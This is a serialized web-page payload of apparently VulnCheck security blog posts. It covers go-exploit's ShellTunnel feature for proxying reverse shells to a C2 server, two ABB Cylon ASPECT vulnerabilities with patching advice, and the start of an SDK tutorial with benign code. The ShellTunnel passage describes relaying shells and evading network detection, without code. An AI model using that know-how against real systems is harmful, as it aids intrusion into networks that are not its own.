This required only a minor version bump and specifying ShellTunnel in the C2 list within the go-exploit configuration.",[61,63191,63193],{"id":63192},"demonstration-shelltunnel-in-action","Demonstration: ShellTunnel in Action",[18,63195,63196],{},[68,63197],{":width":10862,"alt":63198,"src":63199},"ShellTunnel Example","\u002Fblog\u002Fgo-exploit-shelltunnel\u002Fshelltunnel-example.png",[18,63201,63202],{},"To better illustrate, we deployed ShellTunnel in a lab environment using three key components:",[22,63204,63205,63211,63217],{},[25,63206,63207,63210],{},[295,63208,63209],{},"Victim Machine:"," A Windows machine running Confluence, serving as the target of exploitation.",[25,63212,63213,63216],{},[295,63214,63215],{},"Attacker Server:"," This intermediary server captures the reverse shell before forwarding it to the C2.",[25,63218,63219,63222],{},[295,63220,63221],{},"Command and Control Server (C2):"," The final destination for the reverse shell traffic, providing centralized control over the compromised device.",[18,63224,63225],{},"Using this setup, we initiated the attack from the attacker server. After capturing the reverse shell, we forwarded it to the C2 using SSL encryption, enabling us to monitor the traffic with Wireshark for verification. 
This setup allowed us to observe the traffic flow between each component, with unencrypted traffic between the victim and attacker, and SSL-encrypted traffic from the attacker to the C2.",[61,63227,63229],{"id":63228},"benefits-of-shelltunnel-for-exploitation-campaigns","Benefits of ShellTunnel for Exploitation Campaigns",[18,63231,63232],{},"ShellTunnel’s separation of attacker and C2 connections offers several advantages for exploitation efforts:",[22,63234,63235,63241,63247],{},[25,63236,63237,63240],{},[295,63238,63239],{},"Network Evasion:"," Network rules designed to prevent direct outbound connections may be bypassed, as the victim only needs to connect to the attacker server.",[25,63242,63243,63246],{},[295,63244,63245],{},"Enhanced Operational Security:"," Because the target device does not connect directly to the C2, it reduces exposure to network scans and detection tools that monitor external connections.",[25,63248,63249,63252],{},[295,63250,63251],{},"Ease of Implementation:"," ShellTunnel’s configuration in go-exploit requires minimal changes, making it compatible with existing exploits without extensive modification.",[61,63254,63256],{"id":63255},"how-to-get-started-with-shelltunnel-in-go-exploit","How to Get Started with ShellTunnel in go-exploit",[18,63258,63259],{},"The ShellTunnel update is part of go-exploit’s open-source package, available on GitHub. Once set up, adding ShellTunnel to an exploit requires only a few tweaks to the C2 list within go-exploit, making it accessible for various operational scenarios with minimal setup.",[18,63261,63262],{},"We welcome contributions to go-exploit from the community, so if this feature inspires you to build out new C2 methods or you’d like to see specific functionalities in future releases, feel free to submit a pull request.",[18,63264,63265],{},"ShellTunnel brings a new level of flexibility to go-exploit’s C2 capabilities, adding valuable proxying functionality with easy configuration. 
By separating the attacker from the C2, it provides an added layer of evasion and operational security, making it a promising addition for scenarios where avoiding direct C2 connections is critical.",[61,63267,202],{"id":201},[18,63269,63270,63271,1246,63275,982,63278,63281,63282,982,63285,63288],{},"The VulnCheck Initial Access team is always looking to advance the state of attack on initial access vulnerabilities. For more research and updates like this, see our blogs, ",[47,63272,63274],{"href":58306,"rel":63273},[51],"Exploring ABB Vulnerabilities",[47,63276,40447],{"href":53829,"rel":63277},[51],[47,63279,35931],{"href":53837,"rel":63280},[51],"\n. Sign up to start a trial of our ",[47,63283,1245],{"href":45535,"rel":63284},[51],[47,63286,216],{"href":214,"rel":63287},[51]," product today.",{"title":219,"searchDepth":220,"depth":220,"links":63290},[63291,63292,63293,63294,63295,63296,63297,63298,63299],{"id":3520,"depth":220,"text":20},{"id":63125,"depth":220,"text":63126},{"id":63132,"depth":220,"text":63133},{"id":63156,"depth":220,"text":63157},{"id":63185,"depth":220,"text":63186},{"id":63192,"depth":220,"text":63193},{"id":63228,"depth":220,"text":63229},{"id":63255,"depth":220,"text":63256},{"id":201,"depth":220,"text":202},"2024-11-01","The latest feature to hit go-exploit is ShellTunnel. 
ShellTunnel captures reverse shell traffic and routes it through an intermediary attacker-controlled server before reaching the main command-and-control (C2) server.",{"slug":63303},"go-exploit-shelltunnel","\u002Fblog\u002Fgo-exploit-shelltunnel",{"title":63096,"description":63301},"blog\u002Fgo-exploit-shelltunnel","Q2nHAV1ba6AhHd6vDp0vlzitKIXzRgfjPa4iijdbqW0",{"id":63309,"title":58308,"articles":63310,"authors":63336,"body":63338,"date":63470,"description":63471,"extension":234,"image":7,"link":7,"meta":63472,"navigation":237,"path":63474,"seo":63475,"series":7,"stem":63476,"subtype":7,"tags":63477,"__hash__":63479},"blog\u002Fblog\u002Fexploring-abb-ics-vulns.md",[63311,63314,63318,63320,63322,63324,63326,63328,63330,63333],{"title":63312,"source":12149,"link":63313,"date":63300},"VulnCheck finds critical security flaws in ABB building automation and energy management software","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fhackers-target-critical-zero-day-vulnerability-in-ptz-cameras\u002F",{"title":63315,"source":19479,"link":63316,"date":63317},"ABB Smart Building Software Flaws Invite In 
Hackers","https:\u002F\u002Fwww.bankinfosecurity.com\u002Fabb-smart-building-software-flaws-invite-in-hackers-a-26722","2024-11-04",{"title":63315,"source":32210,"link":63319,"date":63317},"https:\u002F\u002Fwww.careersinfosecurity.com\u002Fabb-smart-building-software-flaws-invite-in-hackers-a-26722",{"title":63315,"source":32213,"link":63321,"date":63317},"https:\u002F\u002Fwww.cuinfosecurity.com\u002Fabb-smart-building-software-flaws-invite-in-hackers-a-26722",{"title":63315,"source":32216,"link":63323,"date":63317},"https:\u002F\u002Fwww.databreachtoday.com\u002Fabb-smart-building-software-flaws-invite-in-hackers-a-26722",{"title":63315,"source":32207,"link":63325,"date":63317},"https:\u002F\u002Fwww.devicesecurity.io\u002Fabb-smart-building-software-flaws-invite-in-hackers-a-26722",{"title":63315,"source":32222,"link":63327,"date":63317},"https:\u002F\u002Fwww.govinfosecurity.com\u002Fabb-smart-building-software-flaws-invite-in-hackers-a-26722",{"title":63315,"source":32228,"link":63329,"date":63317},"https:\u002F\u002Fwww.inforisktoday.com\u002Fabb-smart-building-software-flaws-invite-in-hackers-a-26722",{"title":63315,"source":63331,"link":63332,"date":63317},"OTToday","https:\u002F\u002Fwww.ot.today\u002Fabb-smart-building-software-flaws-invite-in-hackers-a-26722",{"title":63334,"source":61436,"link":63335,"date":63317},"Risky Biz News: The mystery at Mango Park, and the Cambodian government's shady reaction","https:\u002F\u002Fnews.risky.biz\u002Frisky-biz-news-the-mystery-at-mango-park-and-the-cambodian-governments-shady-reaction\u002F",[63337],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":63339,"toc":63462},[63340,63342,63359,63363,63366,63369,63373,63376,63382,63391,63397,63401,63409,63414,63418,63421,63427,63430,63434,63445,63447],[1920,63341,20],{"id":3520},[22,63343,63344,63347,63350,63353,63356],{},[25,63345,63346],{},"Vulnerabilities, CVE-2023-0636 and CVE-2024-6209, impact ABB Cylon ASPECT, a widely used building 
automation and energy management system.",[25,63348,63349],{},"CVE-2023-0636 allows command injection, enabling unauthorized remote code execution. While ABB reports authentication is required, testing reveals this is not always enforced.",[25,63351,63352],{},"CVE-2024-6209 enables unauthenticated file disclosure, allowing attackers to extract plain-text credentials, facilitating further exploits within affected systems.",[25,63354,63355],{},"Our team identified 265 reachable ABB Cylon ASPECT systems online, with 214 remaining unpatched, despite the availability of a patch since 2022.",[25,63357,63358],{},"Proof-of-concept exploits are publicly available, yet threat intelligence platforms show limited exploitation activity.",[61,63360,63362],{"id":63361},"video-walkthrough-abb-cylon-aspect-cve-2023-0636-and-cve-2024-6209","Video Walkthrough: ABB Cylon ASPECT CVE-2023-0636 and CVE-2024-6209",[59905,63364],{"allow":59907,"allow-full-screen":10874,"frame-border":445,"height":59908,"referrer-policy":59909,"src":63365,"title":59911,"width":10862},"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FmVJnjB1gGrw?si=U5XuE05Y6APa6GwB",[18,63367,63368],{},"In this week's Initial Access Research, I dove into two key vulnerabilities in ABB's building automation and energy management software, ABB Cylon Aspect. This software is used in major installations like the American Museum of Natural History and UC Irvine, making these vulnerabilities noteworthy for security teams in the Industrial Control Systems (ICS) sector.",[61,63370,63372],{"id":63371},"key-vulnerability-cve-2023-0636","Key Vulnerability: CVE-2023-0636",[18,63374,63375],{},"The main focus of the discussion is CVE-2023-0636, a command injection vulnerability in ABB Cylon Aspect. This vulnerability allows for remote code execution, making it a serious threat, particularly in internet-facing systems. 
While ABB claims authentication is required for exploitation, research shows otherwise, allowing attackers easier access than initially assumed.",[18,63377,63378],{},[68,63379],{":width":10862,"alt":63380,"src":63381},"ABB CVE-2023-0636","\u002Fblog\u002Fexploring-abb-ics-vulns\u002Fcve-2023-0636.png",[18,63383,63384,63385,63390],{},"The VulnCheck team explored exploit data and showcased a proof-of-concept (POC) originally published on ",[47,63386,63389],{"href":63387,"rel":63388},"https:\u002F\u002Fpacketstormsecurity.com\u002Ffiles\u002F181827\u002FABB-Cylon-Aspect-3.07.00-Remote-Code-Execution.html",[51],"Packet Storm"," by security researcher “Liquid Worm.” This POC revealed multiple ways to exploit the command injection, with little resistance in place. VulnCheck verified the vulnerability using internal tooling and developed an unobtrusive version scanner to assess its presence in live systems, discovering 265 reachable systems, of which 214 remain unpatched, despite a patch having been available since 2022.",[18,63392,63393],{},[68,63394],{":width":10862,"alt":63395,"src":63396},"ABB Vulnerable Hosts","\u002Fblog\u002Fexploring-abb-ics-vulns\u002Fabb-vulnerable-hosts.png",[61,63398,63400],{"id":63399},"further-vulnerabilities-file-disclosure-and-remote-code-execution","Further Vulnerabilities: File Disclosure and Remote Code Execution",[18,63402,63403,63404,63408],{},"In addition to CVE-2023-0636, ",[47,63405,63407],{"href":31494,"rel":63406},[51],"Liquid Worm"," disclosed an unauthenticated file disclosure vulnerability, allowing attackers to retrieve user credentials in plain text. 
This gap in ABB’s products significantly elevates the risk, as these credentials can then facilitate other command injections and remote code executions within the system.",[18,63410,63411],{},[68,63412],{":width":10862,"alt":63407,"src":63413},"\u002Fblog\u002Fexploring-abb-ics-vulns\u002Fliquid-worm.png",[61,63415,63417],{"id":63416},"real-world-impact-and-action-for-impacted-organizations","Real-World Impact and Action For Impacted Organizations",[18,63419,63420],{},"The VulnCheck team found hundreds of vulnerable ABB Cylon Aspect installations online through platforms like Shodan and Censys. Surprisingly, despite available exploits, no major exploitation activity has been recorded in threat intelligence sources like GreyNoise. However, this discovery underscores the need for organizations with Industrial Control Systems to actively monitor and patch these vulnerabilities, especially as critical infrastructure software often remains online.",[18,63422,63423],{},[68,63424],{":width":10862,"alt":63425,"src":63426},"Linear Merge Shodan","\u002Fblog\u002Fexploring-abb-ics-vulns\u002Fgreynoise-abb.png",[18,63428,63429],{},"Security professionals should ensure that customers keep such high-risk systems patched, as ABB advises against exposing these systems online at all. 
This highlights the risk associated with unpatched and publicly accessible control systems.",[61,63431,63433],{"id":63432},"what-defenders-can-do","What Defenders Can Do",[22,63435,63436,63439,63442],{},[25,63437,63438],{},"If your organization uses ABB Cylon Aspect, ensure that these devices are patched and up to date.",[25,63440,63441],{},"Ensure the ABB devices and other Industrial Control Systems are not accessible on the internet.",[25,63443,63444],{},"Use the detection signatures we’ve provided to monitor for any signs of exploitation.",[61,63446,202],{"id":201},[18,63448,63449,63450,982,63453,63281,63456,982,63459,63288],{},"The VulnCheck Initial Access team is always looking to advance the state of attack on initial access vulnerabilities. For more research like this, see our blogs, ",[47,63451,40447],{"href":53829,"rel":63452},[51],[47,63454,35931],{"href":53837,"rel":63455},[51],[47,63457,1245],{"href":45535,"rel":63458},[51],[47,63460,216],{"href":214,"rel":63461},[51],{"title":219,"searchDepth":220,"depth":220,"links":63463},[63464,63465,63466,63467,63468,63469],{"id":63361,"depth":220,"text":63362},{"id":63371,"depth":220,"text":63372},{"id":63399,"depth":220,"text":63400},{"id":63416,"depth":220,"text":63417},{"id":63432,"depth":220,"text":63433},{"id":201,"depth":220,"text":202},"2024-10-30","We explore two key vulnerabilities in ABB's building automation and energy management software, ABB Cylon Aspect.",{"slug":63473},"exploring-abb-ics-vulns","\u002Fblog\u002Fexploring-abb-ics-vulns",{"title":58308,"description":63471},"blog\u002Fexploring-abb-ics-vulns",[242,63478],"ics-ot","oDBK6maYOjDrVqC1wK9Wdx9edsp6_66n7awQEY8xQCI",{"id":63481,"title":63482,"articles":7,"authors":63483,"body":63485,"date":64266,"description":64267,"extension":234,"image":7,"link":7,"meta":64268,"navigation":237,"path":64270,"seo":64271,"series":7,"stem":64272,"subtype":7,"tags":64273,"__hash__":64274},"blog\u002Fblog\u002Fpython-go-sdk.md","Bring VulnCheck Intelligence to 
Your Python and Go Apps with Our New SDKs",[63484],{"name":45340,"avatar":45341,"link":45342,"linkName":45343},{"type":15,"value":63486,"toc":64259},[63487,63490,63494,63497,63502,63905,63908,63912,63915,64184,64187,64191,64194,64204,64210,64213,64217,64245,64247,64249,64251,64256],[18,63488,63489],{},"At VulnCheck, we continue to expand access to our exploit intelligence. Following the success of our CLI tool, which brings powerful command-line capabilities to security teams, we’re now taking a step further by introducing VulnCheck SDKs for Python and Go. These SDKs empower developers to seamlessly integrate VulnCheck’s intelligence into their applications, automate vulnerability checks, and explore data in ways that best fit their development environment.",[61,63491,63493],{"id":63492},"code-vulncheck-into-your-python-and-go-applications-faster","Code VulnCheck into Your Python and Go Applications Faster",[18,63495,63496],{},"With the VulnCheck SDKs for Python and Go, integrating vulnerability intelligence into your projects becomes effortless. 
These SDKs abstract away the complexities of directly interacting with the VulnCheck API, providing pre-built functions and classes for common tasks, so you don’t have to manually write HTTP requests or parse JSON.",[18,63498,63499],{},[295,63500,63501],{},"Example: Integrating VulnCheck into Your Python Code",[1354,63503,63505],{"className":11719,"code":63504,"filename":2539,"language":11721,"meta":219,"style":219},"import vulncheck_sdk\n\n# First let's setup a few variables to help us\nDEFAULT_HOST = \"https:\u002F\u002Fapi.vulncheck.com\"\nDEFAULT_API = DEFAULT_HOST + \"\u002Fv3\"\nTOKEN = os.environ[\"VULNCHECK_API_TOKEN\"] # Remember to store your token securely!\n\n# Now let's create a configuration object\nconfiguration = vulncheck_sdk.Configuration(host=DEFAULT_API)\nconfiguration.api_key[\"Bearer\"] = TOKEN\n\n# Pass that config object to our API client and now...\nwith vulncheck_sdk.ApiClient(configuration) as api_client:\n    # We can use two classes to explore the VulnCheck API: EndpointsApi & IndicesApi\n\n    ### EndpointsApi has methods to query every endpoint except `\u002Fv3\u002Findex`\n    # See the full list of endpoints here: https:\u002F\u002Fdocs.vulncheck.com\u002Fapi\n    endpoints_client = vulncheck_sdk.EndpointsApi(api_client)\n\n    # CPE\n    cpe = \"cpe:\u002Fa:microsoft:internet_explorer:8.0.6001:beta\"\n    api_response = endpoints_client.cpe_get(cpe)\n    for cve in api_response.data:\n        print(cve)\n\n    ### IndicesApi has methods for each index\n    indices_client = vulncheck_sdk.IndicesApi(api_client)\n\n    # VulnCheck NVD\n    query_params = vulncheck_sdk.ParamsIdxReqParams(cve=\"CVE-2019-19781\")\n    api_response = indices_client.index_vulncheck_nvd2_get(query_params)\n\n    
print(api_response.data)\n",[886,63506,63507,63514,63518,63523,63537,63556,63586,63590,63595,63622,63647,63651,63656,63681,63686,63690,63695,63700,63721,63725,63730,63744,63766,63786,63797,63801,63806,63826,63830,63835,63864,63885,63889],{"__ignoreMap":219},[1373,63508,63509,63511],{"class":1375,"line":1376},[1373,63510,19043],{"class":4636},[1373,63512,63513],{"class":4640}," vulncheck_sdk\n",[1373,63515,63516],{"class":1375,"line":220},[1373,63517,6520],{"emptyLinePlaceholder":237},[1373,63519,63520],{"class":1375,"line":1266},[1373,63521,63522],{"class":4630},"# First let's setup a few variables to help us\n",[1373,63524,63525,63528,63530,63532,63535],{"class":1375,"line":1852},[1373,63526,63527],{"class":2326},"DEFAULT_HOST",[1373,63529,8575],{"class":1397},[1373,63531,4883],{"class":1387},[1373,63533,63534],{"class":1391},"https:\u002F\u002Fapi.vulncheck.com",[1373,63536,19057],{"class":1387},[1373,63538,63539,63542,63544,63547,63549,63551,63554],{"class":1375,"line":4692},[1373,63540,63541],{"class":2326},"DEFAULT_API",[1373,63543,8575],{"class":1397},[1373,63545,63546],{"class":2326}," DEFAULT_HOST",[1373,63548,15478],{"class":1397},[1373,63550,4883],{"class":1387},[1373,63552,63553],{"class":1391},"\u002Fv3",[1373,63555,19057],{"class":1387},[1373,63557,63558,63561,63563,63566,63568,63572,63574,63576,63579,63581,63583],{"class":1375,"line":4724},[1373,63559,63560],{"class":2326},"TOKEN",[1373,63562,8575],{"class":1397},[1373,63564,63565],{"class":4640}," os",[1373,63567,59],{"class":1383},[1373,63569,63571],{"class":63570},"squCx","environ",[1373,63573,7035],{"class":1383},[1373,63575,183],{"class":1387},[1373,63577,63578],{"class":1391},"VULNCHECK_API_TOKEN",[1373,63580,183],{"class":1387},[1373,63582,15050],{"class":1383},[1373,63584,63585],{"class":4630}," # Remember to store your token 
securely!\n",[1373,63587,63588],{"class":1375,"line":4756},[1373,63589,6520],{"emptyLinePlaceholder":237},[1373,63591,63592],{"class":1375,"line":4768},[1373,63593,63594],{"class":4630},"# Now let's create a configuration object\n",[1373,63596,63597,63600,63602,63605,63607,63610,63612,63615,63617,63620],{"class":1375,"line":4792},[1373,63598,63599],{"class":4640},"configuration ",[1373,63601,5417],{"class":1397},[1373,63603,63604],{"class":4640}," vulncheck_sdk",[1373,63606,59],{"class":1383},[1373,63608,63609],{"class":11735},"Configuration",[1373,63611,1384],{"class":1383},[1373,63613,63614],{"class":19096},"host",[1373,63616,5417],{"class":1397},[1373,63618,63541],{"class":63619},"sk96k",[1373,63621,11875],{"class":1383},[1373,63623,63624,63626,63628,63631,63633,63635,63638,63640,63642,63644],{"class":1375,"line":4798},[1373,63625,45434],{"class":4640},[1373,63627,59],{"class":1383},[1373,63629,63630],{"class":63570},"api_key",[1373,63632,7035],{"class":1383},[1373,63634,183],{"class":1387},[1373,63636,63637],{"class":1391},"Bearer",[1373,63639,183],{"class":1387},[1373,63641,15050],{"class":1383},[1373,63643,8575],{"class":1397},[1373,63645,63646],{"class":2326}," TOKEN\n",[1373,63648,63649],{"class":1375,"line":4806},[1373,63650,6520],{"emptyLinePlaceholder":237},[1373,63652,63653],{"class":1375,"line":4817},[1373,63654,63655],{"class":4630},"# Pass that config object to our API client and now...\n",[1373,63657,63658,63661,63663,63665,63668,63670,63672,63674,63676,63679],{"class":1375,"line":4825},[1373,63659,63660],{"class":4636},"with",[1373,63662,63604],{"class":4640},[1373,63664,59],{"class":1383},[1373,63666,63667],{"class":11735},"ApiClient",[1373,63669,1384],{"class":1383},[1373,63671,45434],{"class":11735},[1373,63673,2230],{"class":1383},[1373,63675,57330],{"class":4636},[1373,63677,63678],{"class":4640}," api_client",[1373,63680,11747],{"class":1383},[1373,63682,63683],{"class":1375,"line":4835},[1373,63684,63685],{"class":4630},"    # We can use two 
classes to explore the VulnCheck API: EndpointsApi & IndicesApi\n",[1373,63687,63688],{"class":1375,"line":4843},[1373,63689,6520],{"emptyLinePlaceholder":237},[1373,63691,63692],{"class":1375,"line":4849},[1373,63693,63694],{"class":4630},"    ### EndpointsApi has methods to query every endpoint except `\u002Fv3\u002Findex`\n",[1373,63696,63697],{"class":1375,"line":4877},[1373,63698,63699],{"class":4630},"    # See the full list of endpoints here: https:\u002F\u002Fdocs.vulncheck.com\u002Fapi\n",[1373,63701,63702,63705,63707,63709,63711,63714,63716,63719],{"class":1375,"line":4915},[1373,63703,63704],{"class":4640},"    endpoints_client ",[1373,63706,5417],{"class":1397},[1373,63708,63604],{"class":4640},[1373,63710,59],{"class":1383},[1373,63712,63713],{"class":11735},"EndpointsApi",[1373,63715,1384],{"class":1383},[1373,63717,63718],{"class":11735},"api_client",[1373,63720,11875],{"class":1383},[1373,63722,63723],{"class":1375,"line":4931},[1373,63724,6520],{"emptyLinePlaceholder":237},[1373,63726,63727],{"class":1375,"line":4947},[1373,63728,63729],{"class":4630},"    # CPE\n",[1373,63731,63732,63735,63737,63739,63742],{"class":1375,"line":4952},[1373,63733,63734],{"class":4640},"    cpe ",[1373,63736,5417],{"class":1397},[1373,63738,4883],{"class":1387},[1373,63740,63741],{"class":1391},"cpe:\u002Fa:microsoft:internet_explorer:8.0.6001:beta",[1373,63743,19057],{"class":1387},[1373,63745,63746,63749,63751,63754,63756,63759,63761,63764],{"class":1375,"line":6776},[1373,63747,63748],{"class":4640},"    api_response ",[1373,63750,5417],{"class":1397},[1373,63752,63753],{"class":4640}," endpoints_client",[1373,63755,59],{"class":1383},[1373,63757,63758],{"class":11735},"cpe_get",[1373,63760,1384],{"class":1383},[1373,63762,63763],{"class":11735},"cpe",[1373,63765,11875],{"class":1383},[1373,63767,63768,63771,63774,63777,63780,63782,63784],{"class":1375,"line":6781},[1373,63769,63770],{"class":4636},"    for",[1373,63772,63773],{"class":4640}," cve 
",[1373,63775,63776],{"class":4636},"in",[1373,63778,63779],{"class":4640}," api_response",[1373,63781,59],{"class":1383},[1373,63783,9156],{"class":63570},[1373,63785,11747],{"class":1383},[1373,63787,63788,63791,63793,63795],{"class":1375,"line":7524},[1373,63789,63790],{"class":1379},"        print",[1373,63792,1384],{"class":1383},[1373,63794,242],{"class":11735},[1373,63796,11875],{"class":1383},[1373,63798,63799],{"class":1375,"line":7530},[1373,63800,6520],{"emptyLinePlaceholder":237},[1373,63802,63803],{"class":1375,"line":7546},[1373,63804,63805],{"class":4630},"    ### IndicesApi has methods for each index\n",[1373,63807,63808,63811,63813,63815,63817,63820,63822,63824],{"class":1375,"line":7571},[1373,63809,63810],{"class":4640},"    indices_client ",[1373,63812,5417],{"class":1397},[1373,63814,63604],{"class":4640},[1373,63816,59],{"class":1383},[1373,63818,63819],{"class":11735},"IndicesApi",[1373,63821,1384],{"class":1383},[1373,63823,63718],{"class":11735},[1373,63825,11875],{"class":1383},[1373,63827,63828],{"class":1375,"line":7598},[1373,63829,6520],{"emptyLinePlaceholder":237},[1373,63831,63832],{"class":1375,"line":7615},[1373,63833,63834],{"class":4630},"    # VulnCheck NVD\n",[1373,63836,63837,63840,63842,63844,63846,63849,63851,63853,63855,63857,63860,63862],{"class":1375,"line":7635},[1373,63838,63839],{"class":4640},"    query_params ",[1373,63841,5417],{"class":1397},[1373,63843,63604],{"class":4640},[1373,63845,59],{"class":1383},[1373,63847,63848],{"class":11735},"ParamsIdxReqParams",[1373,63850,1384],{"class":1383},[1373,63852,242],{"class":19096},[1373,63854,5417],{"class":1397},[1373,63856,183],{"class":1387},[1373,63858,63859],{"class":1391},"CVE-2019-19781",[1373,63861,183],{"class":1387},[1373,63863,11875],{"class":1383},[1373,63865,63866,63868,63870,63873,63875,63878,63880,63883],{"class":1375,"line":7640},[1373,63867,63748],{"class":4640},[1373,63869,5417],{"class":1397},[1373,63871,63872],{"class":4640}," 
indices_client",[1373,63874,59],{"class":1383},[1373,63876,63877],{"class":11735},"index_vulncheck_nvd2_get",[1373,63879,1384],{"class":1383},[1373,63881,63882],{"class":11735},"query_params",[1373,63884,11875],{"class":1383},[1373,63886,63887],{"class":1375,"line":7648},[1373,63888,6520],{"emptyLinePlaceholder":237},[1373,63890,63891,63894,63896,63899,63901,63903],{"class":1375,"line":7672},[1373,63892,63893],{"class":1379},"    print",[1373,63895,1384],{"class":1383},[1373,63897,63898],{"class":11735},"api_response",[1373,63900,59],{"class":1383},[1373,63902,9156],{"class":63570},[1373,63904,11875],{"class":1383},[18,63906,63907],{},"With just a few lines of code, you're able to connect to the VulnCheck API, retrieve Vulnerability, Exploit and IP Intelligence, and accelerate your security projects. This reduces development time and lets you focus on the core functionality of your application or automations.",[61,63909,63911],{"id":63910},"pre-built-functions-for-common-tasks","Pre-built Functions for Common Tasks",[18,63913,63914],{},"One of the best parts of using the VulnCheck SDK is that it comes packed with pre-built functions for accessing VulnCheck Intelligence. For instance, say you’re managing dependencies in a Python project and want to quickly check which vulnerabilities are associated with a particular PURL. 
The VulnCheck SDK for Python allows you to do this in just a few lines of code:",[1354,63916,63918],{"className":11719,"code":63917,"filename":2539,"language":11721,"meta":219,"style":219},"import vulncheck_sdk\nfrom vulncheck_sdk.models.v3controllers_purl_response_data import (\n    V3controllersPurlResponseData,\n)\n\nDEFAULT_HOST = \"https:\u002F\u002Fapi.vulncheck.com\"\nDEFAULT_API = DEFAULT_HOST + \"\u002Fv3\"\nTOKEN = os.environ[\"VULNCHECK_API_TOKEN\"]\n\nconfiguration = vulncheck_sdk.Configuration(host=DEFAULT_API)\nconfiguration.api_key[\"Bearer\"] = TOKEN\n\nwith vulncheck_sdk.ApiClient(configuration) as api_client:\n    endpoints_client = vulncheck_sdk.EndpointsApi(api_client)\n\n    purl = \"pkg:hex\u002Fcoherence@0.1.2\"\n\n    api_response = endpoints_client.purl_get(purl)\n    data: V3controllersPurlResponseData = api_response.data\n\n    print(data.cves)\n",[886,63919,63920,63926,63947,63954,63958,63962,63974,63990,64012,64016,64038,64060,64064,64086,64104,64108,64122,64126,64146,64165,64169],{"__ignoreMap":219},[1373,63921,63922,63924],{"class":1375,"line":1376},[1373,63923,19043],{"class":4636},[1373,63925,63513],{"class":4640},[1373,63927,63928,63931,63933,63935,63938,63940,63943,63945],{"class":1375,"line":220},[1373,63929,63930],{"class":4636},"from",[1373,63932,63604],{"class":4640},[1373,63934,59],{"class":1383},[1373,63936,63937],{"class":4640},"models",[1373,63939,59],{"class":1383},[1373,63941,63942],{"class":4640},"v3controllers_purl_response_data ",[1373,63944,19043],{"class":4636},[1373,63946,4803],{"class":1383},[1373,63948,63949,63952],{"class":1375,"line":1266},[1373,63950,63951],{"class":4640},"    
V3controllersPurlResponseData",[1373,63953,9062],{"class":1383},[1373,63955,63956],{"class":1375,"line":1852},[1373,63957,11875],{"class":1383},[1373,63959,63960],{"class":1375,"line":4692},[1373,63961,6520],{"emptyLinePlaceholder":237},[1373,63963,63964,63966,63968,63970,63972],{"class":1375,"line":4724},[1373,63965,63527],{"class":2326},[1373,63967,8575],{"class":1397},[1373,63969,4883],{"class":1387},[1373,63971,63534],{"class":1391},[1373,63973,19057],{"class":1387},[1373,63975,63976,63978,63980,63982,63984,63986,63988],{"class":1375,"line":4756},[1373,63977,63541],{"class":2326},[1373,63979,8575],{"class":1397},[1373,63981,63546],{"class":2326},[1373,63983,15478],{"class":1397},[1373,63985,4883],{"class":1387},[1373,63987,63553],{"class":1391},[1373,63989,19057],{"class":1387},[1373,63991,63992,63994,63996,63998,64000,64002,64004,64006,64008,64010],{"class":1375,"line":4768},[1373,63993,63560],{"class":2326},[1373,63995,8575],{"class":1397},[1373,63997,63565],{"class":4640},[1373,63999,59],{"class":1383},[1373,64001,63571],{"class":63570},[1373,64003,7035],{"class":1383},[1373,64005,183],{"class":1387},[1373,64007,63578],{"class":1391},[1373,64009,183],{"class":1387},[1373,64011,7103],{"class":1383},[1373,64013,64014],{"class":1375,"line":4792},[1373,64015,6520],{"emptyLinePlaceholder":237},[1373,64017,64018,64020,64022,64024,64026,64028,64030,64032,64034,64036],{"class":1375,"line":4798},[1373,64019,63599],{"class":4640},[1373,64021,5417],{"class":1397},[1373,64023,63604],{"class":4640},[1373,64025,59],{"class":1383},[1373,64027,63609],{"class":11735},[1373,64029,1384],{"class":1383},[1373,64031,63614],{"class":19096},[1373,64033,5417],{"class":1397},[1373,64035,63541],{"class":63619},[1373,64037,11875],{"class":1383},[1373,64039,64040,64042,64044,64046,64048,64050,64052,64054,64056,64058],{"class":1375,"line":4806},[1373,64041,45434],{"class":4640},[1373,64043,59],{"class":1383},[1373,64045,63630],{"class":63570},[1373,64047,7035],{"class":1383},[1373,64049,1
83],{"class":1387},[1373,64051,63637],{"class":1391},[1373,64053,183],{"class":1387},[1373,64055,15050],{"class":1383},[1373,64057,8575],{"class":1397},[1373,64059,63646],{"class":2326},[1373,64061,64062],{"class":1375,"line":4817},[1373,64063,6520],{"emptyLinePlaceholder":237},[1373,64065,64066,64068,64070,64072,64074,64076,64078,64080,64082,64084],{"class":1375,"line":4825},[1373,64067,63660],{"class":4636},[1373,64069,63604],{"class":4640},[1373,64071,59],{"class":1383},[1373,64073,63667],{"class":11735},[1373,64075,1384],{"class":1383},[1373,64077,45434],{"class":11735},[1373,64079,2230],{"class":1383},[1373,64081,57330],{"class":4636},[1373,64083,63678],{"class":4640},[1373,64085,11747],{"class":1383},[1373,64087,64088,64090,64092,64094,64096,64098,64100,64102],{"class":1375,"line":4835},[1373,64089,63704],{"class":4640},[1373,64091,5417],{"class":1397},[1373,64093,63604],{"class":4640},[1373,64095,59],{"class":1383},[1373,64097,63713],{"class":11735},[1373,64099,1384],{"class":1383},[1373,64101,63718],{"class":11735},[1373,64103,11875],{"class":1383},[1373,64105,64106],{"class":1375,"line":4843},[1373,64107,6520],{"emptyLinePlaceholder":237},[1373,64109,64110,64113,64115,64117,64120],{"class":1375,"line":4849},[1373,64111,64112],{"class":4640},"    purl 
",[1373,64114,5417],{"class":1397},[1373,64116,4883],{"class":1387},[1373,64118,64119],{"class":1391},"pkg:hex\u002Fcoherence@0.1.2",[1373,64121,19057],{"class":1387},[1373,64123,64124],{"class":1375,"line":4877},[1373,64125,6520],{"emptyLinePlaceholder":237},[1373,64127,64128,64130,64132,64134,64136,64139,64141,64144],{"class":1375,"line":4915},[1373,64129,63748],{"class":4640},[1373,64131,5417],{"class":1397},[1373,64133,63753],{"class":4640},[1373,64135,59],{"class":1383},[1373,64137,64138],{"class":11735},"purl_get",[1373,64140,1384],{"class":1383},[1373,64142,64143],{"class":11735},"purl",[1373,64145,11875],{"class":1383},[1373,64147,64148,64151,64153,64156,64158,64160,64162],{"class":1375,"line":4931},[1373,64149,64150],{"class":4640},"    data",[1373,64152,4606],{"class":1383},[1373,64154,64155],{"class":4640}," V3controllersPurlResponseData 